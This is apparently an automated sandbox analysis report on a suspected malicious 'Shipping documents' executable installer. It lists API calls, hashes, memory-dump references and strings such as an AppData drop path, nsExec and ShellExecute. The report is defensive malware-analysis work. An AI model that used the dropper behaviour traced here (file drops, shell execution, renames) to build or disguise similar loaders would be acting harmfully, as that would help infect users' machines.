                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004035D7,?,?,?,?,?,?), ref: 0040313F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: FilePointer
                                      • String ID:
                                      • API String ID: 973152223-0
                                      • Opcode ID: 05fd317d58219744d4d36f9992a09dc30e109d4b8129d559949c0663f1233a42
                                      • Instruction ID: 0f2f3f991563ac80fd27f5aa645e2e28db5cd0803139906cd9636725fed969f3
                                      • Opcode Fuzzy Hash: 05fd317d58219744d4d36f9992a09dc30e109d4b8129d559949c0663f1233a42
                                      • Instruction Fuzzy Hash: D2B01231240200BFEA214F00DE0AF067B21F7D0700F10C830B360780F183711460EB4C
                                      APIs
                                      • GetDlgItem.USER32(?,000003F9), ref: 00404436
                                      • GetDlgItem.USER32(?,00000408), ref: 00404442
                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 0040448A
                                      • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004044A3
                                      • SetWindowLongW.USER32(00000000,000000FC,Function_000058D0), ref: 004044BA
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004044D0
                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004044E2
                                      • SendMessageW.USER32(00000000,00001109,00000002), ref: 004044F5
                                      • SendMessageW.USER32(00000000,0000111C,00000000,00000000), ref: 00404501
                                      • SendMessageW.USER32(00000000,0000111B,00000010,00000000), ref: 00404513
                                      • DeleteObject.GDI32(00000000), ref: 00404516
                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404544
                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040454E
                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 004045F9
                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404623
                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404639
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404668
                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404675
                                      • ShowWindow.USER32(?,00000005), ref: 00404689
                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 004047C6
                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404841
                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404860
                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040488C
                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004048C1
                                      • ImageList_Destroy.COMCTL32(00000000), ref: 004048E8
                                      • GlobalFree.KERNEL32(00000000), ref: 004048F8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: MessageSend$ImageWindow$List_Long$GlobalItem$AllocCreateDeleteDestroyFreeLoadMaskedObjectShow
                                      • String ID: M
                                      • API String ID: 1688767230-3664761504
                                      • Opcode ID: 593f695f4e0e7a559147944b019e1e190396842a77f5fef561b0bfd50dce2793
                                      • Instruction ID: 0c70e663620b203d4295ddec51a1238c6828a203a6db769dd6a487d059f7c121
                                      • Opcode Fuzzy Hash: 593f695f4e0e7a559147944b019e1e190396842a77f5fef561b0bfd50dce2793
                                      • Instruction Fuzzy Hash: D812CEB1604301AFD7209F24DC85A6BB7E9EBC8314F104A3EFA95E72E1D7789C018B59
                                      APIs
                                      • GetDlgItem.USER32(?,000003FB), ref: 004040D6
                                      • SetWindowTextW.USER32(00000000,?), ref: 00404100
                                        • Part of subcall function 00406A3A: GetDlgItemTextW.USER32(?,?,00000400,00404F4C), ref: 00406A4D
                                        • Part of subcall function 00406D3D: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,75923420,004039C2), ref: 00406DB2
                                        • Part of subcall function 00406D3D: CharNextW.USER32(?,?,?,00000000), ref: 00406DC1
                                        • Part of subcall function 00406D3D: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,75923420,004039C2), ref: 00406DC6
                                        • Part of subcall function 00406D3D: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,75923420,004039C2), ref: 00406DDE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: Char$Next$ItemText$PrevWindow
                                      • String ID: A$C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer$Exec$hB$hB$hB$perchlorination: Installing
                                      • API String ID: 4089110348-2826575726
                                      • Opcode ID: 167ff9aaa94b94036ddb7a75038adbc32ec6751d602b2a794da5482718eacf52
                                      • Instruction ID: 78a62133d8830c36d5793369ed94498114b99b2b12e517e73a25645684f3fa2c
                                      • Opcode Fuzzy Hash: 167ff9aaa94b94036ddb7a75038adbc32ec6751d602b2a794da5482718eacf52
                                      • Instruction Fuzzy Hash: BD91BFB1704311ABD720AF658C81B6B76A8AF94744F41483EFB42B62D1D77CD9018BAE
                                      APIs
                                      • CoCreateInstance.OLE32(00409ADC,?,00000001,00409ABC,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004023D8
                                      Strings
                                      • C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer, xrefs: 0040241F
                                      • C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll, xrefs: 004024AC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: CreateInstance
                                      • String ID: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll$C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer
                                      • API String ID: 542301482-58875899
                                      • Opcode ID: bc0662a52d98e10143171a3c355a99e9a72edb8270824da348fbf334a5ed34ad
                                      • Instruction ID: 400f91c807c924ebcba0c57f4558c7b9259f909ea30478445bd8bb36a2d5bedd
                                      • Opcode Fuzzy Hash: bc0662a52d98e10143171a3c355a99e9a72edb8270824da348fbf334a5ed34ad
                                      • Instruction Fuzzy Hash: 5E414C72604341AFC700DFA5C888A1BBBE9FF89315F14092EF655DB291DB79D805CB16
                                      APIs
                                      • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402B85
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: FileFindFirst
                                      • String ID:
                                      • API String ID: 1974802433-0
                                      • Opcode ID: 418b3747aa208848d22216286404bd5f33ecbcbc15520eeee9413542a938acf4
                                      • Instruction ID: 4ed41b4626080909459e48417ffb7120e43efe1e52fe46e4786edeb33a661726
                                      • Opcode Fuzzy Hash: 418b3747aa208848d22216286404bd5f33ecbcbc15520eeee9413542a938acf4
                                      • Instruction Fuzzy Hash: ADD0EC61414150A9D2606F71894DABA73ADAF45314F204A3EF156E50D1EAB85501973B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9a6e5cab2d0bf7698bdae054db21990c31fcebd81f7c740a7b631921d0cd6e3b
                                      • Instruction ID: 34855fb2682deb8042092b43f828aa3e625fb4f43d1e7d882369f70b8a17060e
                                      • Opcode Fuzzy Hash: 9a6e5cab2d0bf7698bdae054db21990c31fcebd81f7c740a7b631921d0cd6e3b
                                      • Instruction Fuzzy Hash: 09F17171A183418FCB04CF18C49076ABBE5FF89315F14896EE889EB286D778E941CF56
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8e392d6b6b0d8d2976783d3b417d62ef8802b8105719cbf52046bc6543515951
                                      • Instruction ID: 458c99329ba390570ae49b1fba58edefd6773494dbefaa897816e029df8d06ab
                                      • Opcode Fuzzy Hash: 8e392d6b6b0d8d2976783d3b417d62ef8802b8105719cbf52046bc6543515951
                                      • Instruction Fuzzy Hash: 11C16771A0C3458FC718DF28D580A6ABBE1BBC9304F148A3EE59997380D734E916CF96
                                      APIs
                                      • CheckDlgButton.USER32(?,?,00000001), ref: 00403E29
                                      • EnableWindow.USER32(?), ref: 00403E36
                                      • GetDlgItem.USER32(?,000003E8), ref: 00403E42
                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00403E5E
                                      • GetSysColor.USER32(?), ref: 00403E6F
                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00403E7D
                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00403E8B
                                      • lstrlenW.KERNEL32(?), ref: 00403E91
                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00403E9E
                                      • SendMessageW.USER32(00000000,00000449,?,?), ref: 00403EB5
                                      • GetDlgItem.USER32(?,0000040A), ref: 00403F11
                                      • SendMessageW.USER32(00000000), ref: 00403F18
                                      • EnableWindow.USER32(00000000), ref: 00403F35
                                      • GetDlgItem.USER32(0000004E,000003E8), ref: 00403F59
                                      • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 00403FAE
                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00403FC0
                                      • SetCursor.USER32(00000000), ref: 00403FC9
                                        • Part of subcall function 004069F3: ShellExecuteExW.SHELL32(?), ref: 00406A02
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0040400B
                                      • SetCursor.USER32(00000000), ref: 0040400E
                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040403A
                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404052
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: MessageSend$Cursor$Item$EnableLoadWindow$ButtonCheckColorExecuteShelllstrlen
                                      • String ID: Exec$N
                                      • API String ID: 3270077613-17853963
                                      • Opcode ID: 728db8931e19c03b61cc67d759c3f4433907f5a55aac7dcf5e4c8ff3a598ca13
                                      • Instruction ID: c65a3a36bb4725451a4dfe1d630424e4f24f9f71ba4400fdcb13afcf6ca1fe0a
                                      • Opcode Fuzzy Hash: 728db8931e19c03b61cc67d759c3f4433907f5a55aac7dcf5e4c8ff3a598ca13
                                      • Instruction Fuzzy Hash: A3817DB0604305AFD710AF25DC84A6B7BA9FF84744F01493EF641B62A1C778AD45CF5A
                                      APIs
                                      • DefWindowProcW.USER32(?,?,?,?), ref: 0040102E
                                      • BeginPaint.USER32(?,?), ref: 0040104C
                                      • GetClientRect.USER32(?,?), ref: 00401062
                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010DF
                                      • FillRect.USER32(00000000,?,00000000), ref: 004010F3
                                      • DeleteObject.GDI32(00000000), ref: 004010FA
                                      • CreateFontIndirectW.GDI32(?), ref: 00401120
                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401143
                                      • SetTextColor.GDI32(00000000,000000FF), ref: 0040114D
                                      • SelectObject.GDI32(00000000,00000000), ref: 0040115B
                                      • DrawTextW.USER32(00000000,00434A00,000000FF,?,00000820), ref: 00401171
                                      • SelectObject.GDI32(00000000,00000000), ref: 00401179
                                      • DeleteObject.GDI32(?), ref: 0040117F
                                      • EndPaint.USER32(?,?), ref: 0040118E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                      • String ID: F
                                      • API String ID: 941294808-1304234792
                                      • Opcode ID: c6345d7c5fceae9535b237699f25ce67e7fd4968e8456bbccafdc44fed7c7a8a
                                      • Instruction ID: 3af209a9edb156689bef41e0a63d31b37659a4d6f6412c5d0cf3c0f243fc5647
                                      • Opcode Fuzzy Hash: c6345d7c5fceae9535b237699f25ce67e7fd4968e8456bbccafdc44fed7c7a8a
                                      • Instruction Fuzzy Hash: E041AFB20083509FC7159F65CD4496BBBE9FF88715F140A2EF995A22A1C734DD04CFA5
                                      APIs
                                      • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,00000000,?,0040625E,?,?), ref: 00406341
                                      • GetShortPathNameW.KERNEL32(00000000,004319C0,00000400), ref: 0040634A
                                      • GetShortPathNameW.KERNEL32(?,004311C0,00000400), ref: 00406367
                                      • wsprintfA.USER32 ref: 00406385
                                      • GetFileSize.KERNEL32(00000000,00000000,004311C0,C0000000,00000004,004311C0,?), ref: 004063BD
                                      • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 004063CD
                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 004063FD
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00430DC0,00000000,-0000000A,00409984,00000000,[Rename],00000000,00000000,00000000), ref: 0040641D
                                      • GlobalFree.KERNEL32(00000000), ref: 0040642F
                                      • CloseHandle.KERNEL32(00000000), ref: 00406436
                                        • Part of subcall function 0040691B: GetFileAttributesW.KERNELBASE(00000003,0040342F,C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe,80000000,00000003,?,?,?,?,?), ref: 0040691F
                                        • Part of subcall function 0040691B: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000,?,?,?,?,?), ref: 0040693F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
